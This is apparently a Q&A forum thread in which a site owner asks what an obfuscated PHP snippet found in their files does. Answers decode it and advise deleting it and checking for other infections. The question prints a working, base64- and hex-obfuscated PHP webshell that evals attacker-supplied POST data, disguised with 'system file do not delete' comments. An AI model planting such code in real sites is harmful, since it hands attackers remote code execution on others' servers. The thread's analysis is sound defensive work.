# How to decode this php code in one of my script

Tags: php

I had this in my php file. looks like some malware but i want to know what does it means
what its doing

```
<?php //cb6f82f3e4007bdaccf419abafab94c8
 $_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
 //system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));
```

Comment: Is detected as "Webshell" by Antivirus

Answer (score 1):

Have a look at [base64_decode](http://www.php.net/manual/en/function.base64-decode.php).

Answer (score 1):

`$___` stands for `base64_decode`. Then `$__` is base64_decode'd and evaluated, which executes the following:

```php
$code = base64_decode($_);
eval($code);
```

Which finally executes this:

```php
if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}
```

I would recommend you to delete it and check other files if they are infected, too.

Answer (score 0):

eval — Evaluate a string as PHP code

## Caution

> The eval() language construct is very dangerous because it allows
>   execution of arbitrary PHP code. Its use thus is discouraged. If you
>   have carefully verified that there is no other option than to use this
>   construct, pay special attention not to pass any user provided data
>   into it without properly validating it beforehand.

A short Example:

```
<?php

    $string = 'cup';
    $name = 'coffee';
    $str = 'This is a $string with my $name in it.';
    echo $str. "\n";
    eval("\$str = \"$str\";");
    echo $str. "\n";
?>
```

Output

```
This is a $string with my $name in it.
This is a cup with my coffee in it.
```